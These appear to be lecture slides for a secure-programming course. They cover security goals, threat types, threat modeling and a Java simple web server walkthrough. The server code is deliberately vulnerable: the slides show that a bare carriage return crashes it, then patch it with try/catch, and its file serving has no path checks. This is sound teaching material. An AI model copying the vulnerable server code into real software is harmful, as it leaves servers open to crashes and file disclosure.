1 CHAPTER 1 Security Goals
Welcome to SEC103 on Secure Programming Techniques. In this course, I assume that you have some background in computer security, but now you want to put that background to use. For example, in the Computer Security Principles and Introduction To Cryptography courses, we cover topics concerning trust and encryption. In this course, we put these principles into practice, and I'll show you how to write secure code that builds security into your applications from the ground up. Slides adapted from "Foundations of Security: What Every Programmer Needs To Know" by Neil Daswani, Christoph Kern, and Anita Kesavan. Except as otherwise noted, the content of this presentation is licensed under the Creative Commons 3.0 License.

2 Agenda
Seven Key Security Concepts:
Authentication
Authorization
Confidentiality
Data / Message Integrity
Accountability
Availability
Non-Repudiation
System Example: Web Client-Server Interaction

3 1.1. Security Is Holistic
All three are required: Physical Security, Technological Security (Application, Operating System, and Network Security), and Policies & Procedures.
Physical Security: badges (which must be checked; no piggybacking to be nice), locks on doors, screensavers with passwords.
Technological Security: OS security (e.g., encrypted file systems for laptops), application security (the web server has no vulnerabilities), network security (no unauthorized packets are allowed into your network).
Policies and Procedures: guard against dumpster diving by shredding paper, and against social engineering attacks (i.e., never tell your password to anyone, including a system administrator).

4 Physical Security
Limit access to physical space to prevent asset theft and unauthorized entry
Protect against information leakage and document theft
Ex: Dumpster Diving - gathering sensitive information by sifting through the company's garbage
Physical Security: badges (must be checked; no piggybacking to be nice), locks on doors, screensavers with passwords.

5 1.1.2. Technological Security (1) (Application Security)
No flaws in identity verification process
Configure server correctly: local files, database content
Interpret data robustly
Web Server & Browser Example

6 1.1.2. Technological Security (2) (OS & Network Security)
Apps (e.g. servers) use OS for many functions
OS code likely contains vulnerabilities
Regularly download patches to eliminate them (e.g. Windows Update for critical patches)
Network Security: mitigate malicious traffic
Tools: Firewalls & Intrusion Detection Systems

7 Policies & Procedures
Ex: Social engineering attack - taking advantage of unsuspecting employees (e.g. attacker gets an employee to divulge his username & password)
Guard sensitive corporate information
Employees need to be aware, and educated to be somewhat paranoid and vigilant

8 Security Concepts
Authentication, Authorization, Confidentiality, Data / Message Integrity, Accountability, Availability, Non-Repudiation
Will illustrate each of these concepts through running examples…

9 Archetypal Characters
Alice & Bob – “good guys”
Eve – a “passive” eavesdropper
Mallory – an “active” attacker
Trent – trusted by Alice & Bob

10 1.2. Authentication
Identity Verification
How can Bob be sure that he is communicating with Alice?
Three General Ways:
Something you know (i.e., Passwords)
Something you have (i.e., Tokens)
Something you are (i.e., Biometrics)
(Phone call example… But what about email? The sender name could easily be “spoofed.”)
Will provide one example of each general “way” to achieve authentication, and will provide more details on all “ways” in the section of the course on common attacks and defenses. Some security professionals distinguish between Identification and Authentication. Identification is the “public” part of the authentication process (entering a username, or a biometric scan). Authentication is the “private” part of the authentication process (entering a password or PIN).

11 1.2.1. Something you KNOW
Example: Passwords
Pros: simple to implement; simple for users to understand
Cons: easy to crack (unless users choose strong ones); passwords are reused many times
One-time Passwords (OTP): a different password is used each time, but it is difficult for the user to remember all of them
One-time passwords can be used to address the second “con.” A sketch of how a server can store and check passwords follows.
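A minimal sketch of the server side of password authentication, assuming the server stores only a salted hash rather than the cleartext password; the class name and the sample password are made up for illustration, and a production system would use a slow, dedicated password-hashing function rather than plain SHA-256.

import java.security.MessageDigest;
import java.security.SecureRandom;

public class PasswordCheck {
    /* Hash the salt together with the password so identical
       passwords do not produce identical stored values. */
    static byte[] hash(byte[] salt, String password) throws Exception {
        MessageDigest md = MessageDigest.getInstance("SHA-256");
        md.update(salt);
        return md.digest(password.getBytes("UTF-8"));
    }

    public static void main(String[] args) throws Exception {
        SecureRandom rng = new SecureRandom();
        byte[] salt = new byte[16];
        rng.nextBytes(salt);                          // fresh random salt per user

        byte[] stored = hash(salt, "correct horse");  // what the server keeps on disk

        /* At login time, recompute the hash and compare in constant time. */
        boolean ok = MessageDigest.isEqual(stored, hash(salt, "correct horse"));
        System.out.println("authenticated: " + ok);
    }
}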

12 Something you HAVE
OTP Cards (e.g. SecurID): generate a new password each time the user logs in
Smart Card: tamper-resistant, stores secret information, entered into a card-reader
Token / Key (i.e., iButton)
ATM Card
Strength of authentication depends on difficulty of forging
Smart cards, ATM cards, and other tokens store “secrets.” (A “secret” is a sequence of bits, 0s and 1s, known only to the card/token and the system into which it is inserted.) A sketch of how such a token can derive one-time codes from its secret follows.
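One standard way OTP tokens of this kind derive codes is the HOTP construction (RFC 4226): HMAC a moving counter with the shared secret, then truncate to a short decimal code. The sketch below follows that published algorithm; the key bytes are placeholders, and real SecurID cards use a different, proprietary scheme.

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;

public class Hotp {
    /* One HOTP value: HMAC-SHA1 over the 8-byte big-endian counter,
       then dynamic truncation to a 6-digit code (RFC 4226). */
    static int hotp(byte[] secret, long counter) throws Exception {
        byte[] msg = new byte[8];
        for (int i = 7; i >= 0; i--) { msg[i] = (byte) counter; counter >>>= 8; }

        Mac mac = Mac.getInstance("HmacSHA1");
        mac.init(new SecretKeySpec(secret, "HmacSHA1"));
        byte[] h = mac.doFinal(msg);

        int offset = h[h.length - 1] & 0x0f;          // low nibble picks the window
        int bin = ((h[offset] & 0x7f) << 24) | ((h[offset + 1] & 0xff) << 16)
                | ((h[offset + 2] & 0xff) << 8) | (h[offset + 3] & 0xff);
        return bin % 1_000_000;
    }

    public static void main(String[] args) throws Exception {
        byte[] secret = "12345678901234567890".getBytes("UTF-8"); // placeholder key
        for (long c = 0; c < 3; c++)
            System.out.printf("counter %d -> %06d%n", c, hotp(secret, c));
    }
}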

13 1.2.3. Something you ARE
Biometrics
Pros: “raises the bar”
Cons: false positives/negatives, social acceptance, key management
false positive: impostor accepted
false negative: authentic user rejected

Technique             Effectiveness   Acceptance
Palm Scan             1               6
Iris Scan             2               –
Retinal Scan          3               7
Fingerprint           4               5
Voice Id              –               –
Facial Recognition    –               –
Signature Dynamics    –               –

Iris scan: camera takes a picture of iris features. Retinal scan: a beam of light is projected into the eye and scans the retinal blood-vessel pattern; the eye is put up to a device, and a puff of air is blown into the eye. Signature dynamics: physical motions (pressure/speed) are translated into characteristic electrical signals that are unique to the person writing the signature. Key management: users can't get another thumbprint if their “key” is compromised! Other cons: people change over time (my face may not be exactly the same over ten years). (See CISSP All-In-One page 131)

14 Final Notes
Two-factor Authentication: methods can be combined (e.g. ATM card & PIN)
Who is authenticating whom? Person-to-computer? Computer-to-computer?
Three types (e.g. SSL):
Client Authentication: server verifies client's id
Server Authentication: client verifies server's id
Mutual Authentication (Client & Server)
Authenticated user is a “Principal”
Methods can be combined: consider a typical ATM transaction. A user is authenticated based on something he/she HAS (the ATM card) and something he/she KNOWS (the PIN). This is also called “two-factor” authentication.

15 1.3. Authorization Checking whether a user has permission to conduct some action Identity vs. Authority Is a “subject” (Alice) allowed to access an “object” (open a file)? Access Control List: mechanism used by many operating systems to determine whether users are authorized to conduct different actions In the ATM example, authorization asks the question (once the user John Doe has been authenticated), “Does John Doe have permission to withdraw $200?” It depends on the amount of money that John Doe has in his bank account (must be >= $200), and the amount of money that John has already withdrawn earlier today (most ATMs let a user take out a maximum of $300 per day). OSes use ACLs. Capabilities are another mechanism that can be used to implement authorization. (See backup slides at end of course.)

16 1.3.1. Access Control Lists (ACLs)
Set of three-tuples <User, Resource, Privilege>
Specifies which users are allowed to access which resources with which privileges
Privileges can be assigned based on roles (e.g. admin)

Table 1-1. A Simple ACL
User    Resource        Privilege
Alice   /home/Alice/*   Read, write, execute
Bob     /home/Bob/*     Read, write, execute

Mandatory: system decides which users have access to which objects (i.e. Bell-LaPadula: Unclassified, Confidential, Secret, Top Secret with No Read Up and No Write Down)
Discretionary: users decide who has access to objects they own
Role-Based: system decides which users can access which objects based on their *role*. A sketch of an ACL check as code follows.
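A toy illustration, not taken from any real OS, of an ACL held as a set of <User, Resource, Privilege> three-tuples; real systems index the structure per object and support wildcards like /home/Alice/*, which this sketch ignores.

import java.util.HashSet;
import java.util.Set;

public class SimpleAcl {
    /* Each entry is one <User, Resource, Privilege> three-tuple,
       flattened into a single string key for the set. */
    private final Set<String> entries = new HashSet<>();

    void grant(String user, String resource, String privilege) {
        entries.add(user + "|" + resource + "|" + privilege);
    }

    boolean isAuthorized(String user, String resource, String privilege) {
        return entries.contains(user + "|" + resource + "|" + privilege);
    }

    public static void main(String[] args) {
        SimpleAcl acl = new SimpleAcl();
        acl.grant("Alice", "/home/Alice/index.html", "read");

        System.out.println(acl.isAuthorized("Alice", "/home/Alice/index.html", "read")); // true
        System.out.println(acl.isAuthorized("Bob",   "/home/Alice/index.html", "read")); // false
    }
}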

17 1.3.2. Access Control Models ACLs used to implement these models
Mandatory: computer system decides exactly who has access to which resources Discretionary (e.g. UNIX): users are authorized to determine which other users can access files or other resources that they create, use, or own Role-Based (Non-Discretionary): user’s access & privileges determined by role

18 1.3.3. Bell-LaPadula Model
Classifications: Top Secret, Secret, Confidential, Unclassified
3 Rules/Properties:
Simple property
*-property (confinement)
Tranquility property
Basic Security Theorem: if the system starts in a secure state, and every state transition is secure, then the system will be secure after all transitions have been traversed.
Simple property: can't read data at a higher level (no read up). *-property: can't write down (why? To prevent a Trojan horse executed by someone with a high classification from sharing data with a lower classification). Tranquility: the security level of an object can't be changed while it is being used. Can be used to implement either mandatory or discretionary access control. A sketch of the two rules as code follows.
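A sketch of the two Bell-LaPadula rules, under the simplifying assumption that a label is just one of the four classifications (real labels also carry compartments): reads require the subject's level to dominate the object's ("no read up"), writes require the reverse ("no write down").

public class BellLaPadula {
    /* Ordered low to high, so ordinal() comparisons give the dominance relation. */
    enum Level { UNCLASSIFIED, CONFIDENTIAL, SECRET, TOP_SECRET }

    /* Simple property: no read up. */
    static boolean mayRead(Level subject, Level object) {
        return subject.ordinal() >= object.ordinal();
    }

    /* *-property (confinement): no write down. */
    static boolean mayWrite(Level subject, Level object) {
        return subject.ordinal() <= object.ordinal();
    }

    public static void main(String[] args) {
        System.out.println(mayRead(Level.SECRET, Level.TOP_SECRET));    // false: read up denied
        System.out.println(mayWrite(Level.SECRET, Level.CONFIDENTIAL)); // false: write down denied
    }
}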

19 1.4. Confidentiality Goal: Keep the contents of communication or data on storage secret Example: Alice and Bob want their communications to be secret from Eve Key – a secret shared between Alice & Bob Sometimes accomplished with Cryptography, Steganography, Access Controls, Database Views Confidentiality can be achieved through some sort of encryption with a “key” but can be achieved through other mechanisms as well.

20 1.5. Message/Data Integrity
Data Integrity = No Corruption
Man-in-the-middle attack: has Mallory tampered with the message that Alice sends to Bob?
Integrity Check: add redundancy to data/messages
Techniques:
Hashing (MD5, SHA-1, …), Checksums (CRC…)
Message Authentication Codes (MACs)
Different From Confidentiality:
A -> B: “The value of x is 1” (not secret)
A -> M -> B: “The value of x is 10000” (BAD)
A -> M -> B: “The value of y is 1” (BAD)
Downloading security software is another example that illustrates the difference between confidentiality and message/data integrity. It is necessary to take distinct precautions to ensure data integrity even if communications are encrypted. A MAC sketch follows.
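A short sketch of a message authentication code using the standard javax.crypto API; the shared key here is a placeholder that Alice and Bob would have established beforehand. Mallory cannot recompute a valid tag after changing "1" to "10000" because she lacks the key.

import javax.crypto.Mac;
import javax.crypto.spec.SecretKeySpec;
import java.security.MessageDigest;

public class MacDemo {
    public static void main(String[] args) throws Exception {
        byte[] key = "shared-secret-key-placeholder".getBytes("UTF-8");
        Mac mac = Mac.getInstance("HmacSHA256");
        mac.init(new SecretKeySpec(key, "HmacSHA256"));

        /* Alice sends the message plus its tag; doFinal resets the Mac for reuse. */
        byte[] tag = mac.doFinal("The value of x is 1".getBytes("UTF-8"));

        /* Bob recomputes the tag over what he received; a mismatch reveals tampering. */
        byte[] check = mac.doFinal("The value of x is 10000".getBytes("UTF-8"));
        System.out.println("intact: " + MessageDigest.isEqual(tag, check)); // false
    }
}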

21 1.6. Accountability
Able to determine the attacker or principal
Logging & Audit Trails
Requirements:
Secure Timestamping (OS vs. Network)
Data integrity in logs & audit trails: must not be able to change trails, or must at least be able to detect changes to logs
Otherwise an attacker can cover their tracks
Authentication + signing in / out of a building creates accountability. Audit trail: a stored sequence of commands that a user issues at a computer terminal. Most existing logging/auditing security systems do not provide secure timestamping or data integrity; hence, an attacker can break into a system and then change the logs to hide the fact that she was ever there!

22 1.7. Availability
Uptime, Free Storage
Ex: dial-tone availability, system downtime limit, web server response time
Solutions:
Add redundancy to remove single points of failure
Impose “limits” on what legitimate users can use (a rate-limiting sketch follows)
The goal of DoS (Denial of Service) attacks is to reduce availability
Malware used to send excessive traffic to victim site
Overwhelmed servers can't process legitimate traffic
Why is Availability a Security Goal? Consider this extreme case: a computer that is turned off is extremely secure (no one can hack into it), but it is unavailable and unusable.
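One way to "impose limits" in code, sketched as a crude per-client request counter; the one-minute window and the cap of 100 requests are made-up numbers, and real servers usually prefer smoother schemes such as token buckets.

import java.util.HashMap;
import java.util.Map;

public class RequestLimiter {
    private static final int MAX_PER_WINDOW = 100;   // made-up cap
    private static final long WINDOW_MS = 60_000;    // one-minute window

    private final Map<String, Integer> counts = new HashMap<>();
    private long windowStart = System.currentTimeMillis();

    /* Returns true if this client is still under its quota for the current window. */
    synchronized boolean allow(String clientIp) {
        long now = System.currentTimeMillis();
        if (now - windowStart > WINDOW_MS) {         // start a fresh window
            counts.clear();
            windowStart = now;
        }
        int n = counts.merge(clientIp, 1, Integer::sum);
        return n <= MAX_PER_WINDOW;
    }
}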

23 1.8. Non-Repudiation
Undeniability of a transaction
Alice wants to prove to Trent that she did communicate with Bob
Generate evidence / receipts (digitally signed statements)
Often not implemented in practice; credit-card companies become de facto third-party verifiers

24 1.9. Concepts at Work (1)
PCs-R-Us (Bob) orders parts from DVD-Factory through its B2B website.
Is DVD-Factory Secure?

25 1.9. Concepts at Work (2)
Availability: DVD-Factory ensures its web site is running 24-7
Authentication: Bob authenticates himself to DVD-Factory, Inc., and DVD-Factory authenticates itself to Bob
Confidentiality: Bob's browser and the DVD-Factory web server set up an encrypted connection (lock on bottom left of browser)
Is DVD-Factory Secure? This is actually a complicated question. We can break it down and ask “Is DVD-Factory Available? Confidential? Etc.”

26 1.9. Concepts at Work (3)
Authorization: DVD-Factory web site consults a DB to check if Bob is authorized to order parts on behalf of PCs-R-Us
Message / Data Integrity: checksums are sent as part of each TCP/IP packet exchanged (+ SSL uses MACs)
Accountability: DVD-Factory logs that Bob placed an order for Sony DVD-R 1100
Non-Repudiation: typically not provided with web sites, since a trusted third party (TTP) is required

27 Summary Technological Security In Context Seven Key Security Concepts
DVD-Factory Example: Security Concepts at Work

28 CHAPTER 2 Secure Systems Design

29 Agenda Understanding Threats “Designing-In” Security
Convenience and Security Security By Obscurity Open vs. Closed Source A Game of Economics In the previous chapter, we covered a number of high-level requirements that more secure systems strive to provide. In this chapter, we will discuss a number of design principles that security architects typically keep in mind when building secure systems.

30 2.1. Understanding Threats
ID & Mitigate Threats:
Defacement
Infiltration
Phishing
Pharming
Insider Threats
Click Fraud
Denial of Service
Data Theft/Loss

31 Defacement
Online vandalism: attackers replace legitimate pages with illegitimate ones
Often targeted towards political web sites
Ex: White House website defaced by anti-NATO activists, Chinese hackers

32 Infiltration Unauthorized parties gain access to resources of computer system (e.g. CPUs, disk, network bandwidth) Could gain read/write access to back-end DB Ensure that attacker’s writes can be detected Different goals for different organizations Political site only needs integrity of data Financial site needs integrity & confidentiality

33 2.1.3. Phishing
Attacker sets up a spoofed site that looks real
Lures users to enter login credentials and stores them
Usually an email with a link to the spoofed site is sent, asking users to “verify” their account info
The links might be disguised through the click text
Wary users can see the actual URL if they hover over the link

34 Pharming Like phishing, attacker’s goal is to get user to enter sensitive data into spoofed website DNS Cache Poisoning – attacker is able to redirect legitimate URL to their spoofed site DNS translates URL to appropriate IP address Attacker makes DNS translate legitimate URL to their IP address instead and the result gets cached, poisoning future replies as well

35 Insider Threats Attacks carried out with cooperation of insiders Insiders could have access to data and leak it Ex: DB and Sys Admins usually get complete access Separation of Privilege / Least Privilege Principle Provide individuals with only enough privileges needed to complete their tasks Don’t give unrestricted access to all data and resources

36 2.1.6. Click Fraud
Targeted against pay-per-click ads
Attacker could click on competitors' ads
Depletes their ad budgets; attacker gains exclusive attention of legitimate users
Site publishers could click on ads to gain revenue
Automated through malware such as botnets

37 2.1.7. Denial of Service (DoS)
Attacker inundates server with packets causing it to drop legitimate packets Makes service unavailable, downtime = lost revenue Particularly a threat for financial and e-commerce vendors Can be automated through botnets

38 2.1.8. Data Theft and Data Loss
Several Examples: BofA, ChoicePoint, VA BofA: backup data tapes lost in transit ChoicePoint: fraudsters queried DB for sensitive info VA: employee took computer with personal info home & his home was burglarized CA laws require companies to disclose theft/loss Even for encrypted data, should store key in separate media

39 Threat Modeling

Application Type                          Most Significant Threat
Civil liberties / White House web site    Defacement
Financial institution / E-commerce site   Compromise of one or more accounts; Denial-of-Service
Military institution                      Infiltration; access to classified data

Now that we have talked about a few things that you should not do when attempting to secure an application, we are going to spend the remainder of this chapter talking about things that you should do. The first step in figuring out where to spend your time securing your application is to do some threat modeling. The goal of building a threat model is to determine what the most significant threats to your application are. That is, you want to spend time thinking about what the bad guy is most interested in doing when it comes to your application. For example, if you are running a web site that is responsible for making political statements, or that represents a political figure, such as the ACLU web site or the White House web site, the bad guy is probably most interested in defacing your site in the hopes of promoting his or her own political statement. On the other hand, if you are running the web site of a financial institution or an electronic commerce site, the bad guy is probably most interested in stealing valuable account or credit card numbers from your database. This is different from the case of the political web site, because it is probably OK for the information in the database that runs the political web site to be public, and we don't mind if people get access to it so long as they cannot change or modify it. In the case of the financially oriented web site, we DO mind if the attacker gets access to it. If the attacker is able to change or delete the account and credit card numbers but not read this information, this is less severe, since we could always restore the information from a backup. (The customers of the web site might be slightly inconvenienced, but at least they won't have to have their account and/or credit card numbers changed.) Electronic commerce sites also face denial-of-service attacks as a highly significant threat. A denial-of-service attack is one in which the attacker is able to figure out a way to send so much data traffic to the web site that the web site spends all its time servicing the requests from the attacker, and the requests of legitimate users cannot be answered. A denial-of-service attack is a significant threat for an electronic commerce web site because valuable revenue will be lost if the web site is not available to take orders from users. While a political web site might “lose face” if it suffers from a denial-of-service attack, there probably is not a direct loss in revenue that can be associated with the attack (unless, of course, the web site takes donations online!) Finally, military institutions are concerned with the leakage of classified information as their most significant threat. When assessing the security requirements for a new application, it is important to build a threat model. The types of attacks in the threat model will most likely guide the design of the software that is used to secure the application.

40 2.2. Designing-In Security
Design features with security in mind, not as an afterthought
Hard to “add on” security later
Define concrete, measurable security goals. Ex:
Only certain users should be able to do X. Log the action.
Output of feature Y should be encrypted.
Feature Z should be available 99.9% of the time
Bad Examples: Windows 98, Internet
If you are building a system that needs to be secure, it is important to think about security up front as part of its design; that is, security should be designed into the system from the start. Systems are often built to meet a set of functionality and performance criteria, and software developers then attempt to make these systems secure only as an afterthought. That is the wrong way to design a system. Experience has shown that it is very hard to “add on” security to a system after it has been developed. For example, consider the design of the Windows 98 operating system (OS). Microsoft's highest-priority goals were to pack as much functionality as possible into the OS, and to deploy the software on time. Providing security and an access control mechanism was not among the primary design criteria, as evidenced by many of the security holes in the product. For instance, the OS includes a feature that allows a PC to boot up into a “safe” or diagnostic mode without the entry of a username or password at all. A user may simply hit the F8 key as the boot sequence starts to have the PC boot up in this diagnostic mode, thereby bypassing the required entry of a username and password. The problem with this is that an attacker who gains physical access to the system could access the contents of the user's entire disk by pressing the F8 key during the boot sequence. A better design of this feature, one that kept security in mind from the start, would require the user to enter a username and password to enter the diagnostic mode. The only user that should be authorized to boot up the PC in diagnostic mode and be given full access to the disk is the system administrator. Examples: F8 on Windows boot-up bypasses password entry and puts the computer into diagnostic mode. TCP/IP: no accountability; anyone is free to send packets, and denial-of-service attacks occur because bad guys can send out many packets at no cost. Security added as an afterthought usually results in a “turtle” architecture: a hard outer shell, but a very soft inside. Examples of concrete, measurable security goals: 1) Only certain users should be authorized to use this feature. 2) This feature should be available 99.9% of the time (i.e. dial-tone) even under a denial-of-service attack. 3) Information output by this feature should be encrypted. 4) A log or audit trail should be kept every time this feature is used. March 2002: the .NET Server ship date was delayed due to security vulnerabilities. This had almost never happened before, and could only happen because security was defined as part of the server's set of features. Security often requires architectural changes. Systems that “add on” security later are like turtles: they might employ some type of hard shell added on top of the system to defend it, but if an attacker can find a way around the shell, the system will be easy to attack. “Adding security later on” may require disabling newer features anyway, so why build features at all unless you build them securely to begin with?
Securing an application later on may require significant changes (e.g., not using certain library functions such as strcpy), and changing things too late in the development of the application may introduce 1) risk, and 2) pressure to get the changes done before the deadline.

41 2.2.1. Windows 98
Diagnostic Mode: accessed through the 'F8' key when booting
Can bypass password protections, giving an attacker complete access to hard disks & data
Username/password security was added as an afterthought
It should have been included from the start, and then required for entering diagnostic mode

42 The Internet
All nodes originally university or military (i.e. trusted), since the network grew out of DARPA
With commercialization, lots of new hosts, all allowed to connect to existing hosts regardless of whether they were trusted
Deployed Firewalls: allow a host to let in only trusted traffic
Loopholes: lying about IPs, using cleared ports

43 IP Whitelisting & Spoofing
IP Whitelisting: accepting communications only from hosts with certain IP addresses
IP Spoofing attack: attacker mislabels (i.e. lies about) the source address on packets and slips past the firewall
Response to the spoofed packet is sent to the real host, not the attacker
Multiple communication rounds make the attack harder
Attacker may DoS the legitimate host to prevent it from responding

44 IP Spoofing & Nonces
Nonce: one-time pseudo-random number
Attaching a nonce to a reply and requesting that it be echoed back can guard against IP spoofing
Attacker won't know what reply to fake
Spoofing is easier for non-connection-oriented protocols (e.g. UDP) than connection-oriented ones (e.g. TCP)
TCP sequence #s should be random; otherwise an attacker can predict them and inject packets into a conversation. A nonce sketch follows.
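A sketch of the nonce idea, assuming the server already has some channel to the claimed source address: it issues a fresh unpredictable value and proceeds only if the same value comes back. A spoofer who never sees the reply cannot echo it. The class name is made up for illustration.

import java.security.SecureRandom;
import java.util.Base64;

public class NonceCheck {
    private static final SecureRandom RNG = new SecureRandom();

    /* Issue a one-time pseudo-random challenge. */
    static String freshNonce() {
        byte[] b = new byte[16];
        RNG.nextBytes(b);
        return Base64.getEncoder().encodeToString(b);
    }

    /* The claimed source is verified only if it echoes the exact challenge back. */
    static boolean verifyEcho(String challenge, String echoed) {
        return challenge.equals(echoed);
    }

    public static void main(String[] args) {
        String challenge = freshNonce();   // sent to the claimed source address
        System.out.println("address verified: " + verifyEcho(challenge, challenge));
    }
}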

45 2.2.3. Turtle Shell Architectures
Inherently insecure system protected by another system mediating access to it Ex: Firewalls guard vulnerable systems within Ex: Death Star “strong outer defense” but vulnerable Hard outer shell should not be sole defense

46 2.3. Convenience and Security
Sometimes inversely proportional More secure → Less convenient Too Convenient → Less secure If too inconvenient → unusable → users will workaround → insecure Ex: users may write down passwords Good technologies increase both: relative security benefit at only slight inconvenience Until now, we have talked about how to pursue designing security for our systems. We must, however, acknowledge that security comes at a price to users. Typically, the more security technology that is deployed, the less convenient using a system becomes for users. For example, if we require our users to have passwords, and we allow our users to use any password they would like, then this might lead to security vulnerabilities since some users might choose passwords that are very easy to guess. On the other hand, if we assign complicated, hard-to-guess passwords to users, then our system will be more secure, but it will also be less convenient for users. Users may forget their passwords that we assign them. The interaction between security and convenience is not one way either. If the passwords that we assign are complicated enough, users might decide to write these passwords down (even if we tell them not to). Users might even write down their passwords in a place that a hacker might be able to access. Passwords written down in places that a hacker might find them could lead to an overall less secure system than if they were never written down anywhere at all. What this shows is that if a security policy is too inconvenient, users may do unexpected things (or just not listen to us), and we will end up with an overall insecure system anyhow. In summary, more security is usually more inconvenient, but more inconvenient does not mean more secure. A good security policy or technology will increase both security and convenience, but it is typically hard to achieve both. For example, if we were to allow users to choose their own passwords, but somehow “check” that their password is not “easy to guess,” and ask them to choose another one if it doesn’t satisfy our check, we will be achieving better security at the cost of hopefully only a minor inconvenience. (Requiring stronger passwords means that more users will have trouble selecting one. Think about examples of technologies that increase both convenience and security.)

47 2.4. Simple Web Server (SWS)
To illustrate what can go wrong if we do not design for security in our web applications from the start, consider a simple web server implemented in Java.
Only serves documents using HTTP
We walk through the code in the following slides

48 2.4.1. Hypertext Transfer Protocol (1)
HTTP is the communications protocol used to connect to servers on the Web
Its primary function is to establish a connection with a server & transmit HTML pages to client browsers, or any other files required by an HTTP application.
Website addresses begin with an "http://" prefix.

49 2.4.1. HTTP (2)
A typical HTTP request that a browser makes to a web server:
GET / HTTP/1.0
When the server receives this request for filename / (the root document on the web server), it attempts to load index.html. It returns
HTTP/1.0 200 OK
followed by the document contents.

50 SWS: main
/* This method is called when the program is run from the command line. */
public static void main (String argv[]) throws Exception {
    /* Create a SimpleWebServer object, and run it */
    SimpleWebServer sws = new SimpleWebServer();
    sws.run();
}
Now we walk through the code… main() creates a SimpleWebServer object and calls its run() method. The run() method is just an infinite loop that waits for a connection from a client and then attempts to process the request.

51 2.4.2. SimpleWebServer Object
public class SimpleWebServer {
    /* Run the HTTP server on this TCP port. */
    private static final int PORT = 8080;

    /* The socket used to process incoming connections from web clients */
    private static ServerSocket dServerSocket;

    public SimpleWebServer () throws Exception {
        dServerSocket = new ServerSocket (PORT);
    }

    public void run() throws Exception {
        while (true) {
            /* wait for a connection from a client */
            Socket s = dServerSocket.accept();

            /* then process the client's request */
            processRequest(s);
        }
    }
Here is the SimpleWebServer object. First we initialize a variable that holds the port number the web server should listen to for connections from clients. Then we initialize a ServerSocket. Socket: the method of directing data to the appropriate application in a TCP/IP network. The combination of the IP address of the station and a port number makes up a socket. Think of this like an electrical socket. A web server and a web client both have a “virtual” power strip with many sockets on it. A web client can talk to a server by selecting one of its sockets, and then selecting a server socket and plugging a virtual wire into each end. The run() method has an infinite loop waiting for a connection from a client. The call to ServerSocket accept() returns a socket object that corresponds to a unique socket on the server. This allows the server to communicate with the client. Once the communication is established, the client's request is processed.

52 2.4.2. SWS: processRequest (1)
/* Reads the HTTP request from the client, and responds with the file the user requested or a HTTP error code. */
public void processRequest(Socket s) throws Exception {
    /* used to read data from the client */
    BufferedReader br = new BufferedReader (new InputStreamReader (s.getInputStream()));

    /* used to write data to the client */
    OutputStreamWriter osw = new OutputStreamWriter (s.getOutputStream());

    /* read the HTTP request from the client */
    String request = br.readLine();

    String command = null;
    String pathname = null;
processRequest() takes the client socket as input. It uses this socket to create BufferedReader and OutputStreamWriter objects. Once these communication objects are created, the method attempts to read a line of input from the client using the BufferedReader. We expect this line of input to be an HTTP GET request (as discussed earlier).

53 2.4.2. SWS: processRequest (2)
    /* parse the HTTP request */
    StringTokenizer st = new StringTokenizer (request, " ");
    command = st.nextToken();
    pathname = st.nextToken();

    if (command.equals("GET")) {
        /* if the request is a GET, try to respond with the file the user is requesting */
        serveFile (osw, pathname);
    }
    else {
        /* if the request is NOT a GET, return an error saying this server does not implement the requested command */
        osw.write ("HTTP/1.0 501 Not Implemented\n\n");
    }

    /* close the connection to the client */
    osw.close();
The StringTokenizer object is used to break up the request into its constituent parts: GET, and the pathname to the file the client would like to download. If the command is a “GET”, we call the serveFile() method; else we issue an error. Then we close the connection to the client.

54 SWS: serveFile (1)
public void serveFile (OutputStreamWriter osw, String pathname) throws Exception {
    FileReader fr = null;
    int c = -1;
    StringBuffer sb = new StringBuffer();

    /* remove the initial slash at the beginning of the pathname in the request */
    if (pathname.charAt(0) == '/')
        pathname = pathname.substring(1);

    /* if there was no filename specified by the client, serve the "index.html" file */
    if (pathname.equals(""))
        pathname = "index.html";
The first “if” removes the initial slash at the beginning of the pathname, and the second “if” sets the file to be downloaded to index.html if another file was not specified.

55 2.4.2. SWS: serveFile (2)
    /* try to open the file specified by pathname */
    try {
        fr = new FileReader (pathname);
        c = fr.read();
    }
    catch (Exception e) {
        /* if the file is not found, return the appropriate HTTP response code */
        osw.write ("HTTP/1.0 404 Not Found\n\n");
        return;
    }
Now the method attempts to open the file and read it into the web server's memory. If the FileReader object is unable to open the file and read a byte from it, it issues an error message.

56 SWS: serveFile (3)
    /* if the requested file can be successfully opened and read, then return an OK response code and send the contents of the file */
    osw.write ("HTTP/1.0 200 OK\n\n");
    while (c != -1) {
        sb.append((char)c);
        c = fr.read();
    }
    osw.write (sb.toString());
If the file was successfully opened, the method sends the HTTP/1.0 200 OK message, then enters a while loop that reads bytes from the file and appends them to a StringBuffer until the end of the file is reached. Then this StringBuffer is sent to the client.

57 2.5. Security in Software Requirements
Robust, consistent error handling Share reqs w/ QA team Handle internal errors securely – don’t provide error messages to potential attackers! Validation and Fraud Checks “Security or Bust” Policy

58 2.5.1. Specifying Error Handling Requirements
Vulnerabilities often due to bad error handling Example: DoS on SWS – makes it unavailable Just send a carriage return as the first message instead of a properly formatted GET message… Causes exception when breaking into tokens

59 2.5.1. DoS on SWS Example
processRequest():
/* read the HTTP request from the client */
String request = br.readLine();    // empty string

String command = null;
String pathname = null;

/* parse the HTTP request */
StringTokenizer st = new StringTokenizer (request, " ");
command = st.nextToken();          // EXCEPTION: no tokens!
/* SERVER CRASHES HERE – DENIAL OF SERVICE! */
pathname = st.nextToken();
Trace the code, assuming a CR sent from the client. We read the line of input from the client. When we tokenize, the line command = st.nextToken(); results in an exception. Control is returned to run(), which does not handle the exception; then control is returned to main(), which does not handle the exception either. Java terminates the application.

60 How Do We Fix This? The web server should immediately disconnect from any web client that sends a malformed HTTP request to the server. The programmer needs to carefully handle exceptions to deal with malformed requests. Solution: Surround susceptible String Tokenizing code with try/catch block.

61 2.5.1. Try/Catch Solution
/* read the HTTP request from the client */
String request = br.readLine();
String command = null;
String pathname = null;

try {
    /* parse the HTTP request */
    StringTokenizer st = new StringTokenizer (request, " ");
    command = st.nextToken();
    pathname = st.nextToken();
}
catch (Exception e) {
    osw.write ("HTTP/1.0 400 Bad Request\n\n");
    osw.close();
    return;
}
Close the connection to the client, rather than crash the server…

62 2.5.2. Sharing Requirements with Quality Assurance (QA)
Both dev & testers should get requirements
Should have test cases for security too:
Does it malfunction when provided bad input?
Ping-of-Death: sending a single malformed packet can cause a server to crash
Ex: DoS attack on SimpleWebServer
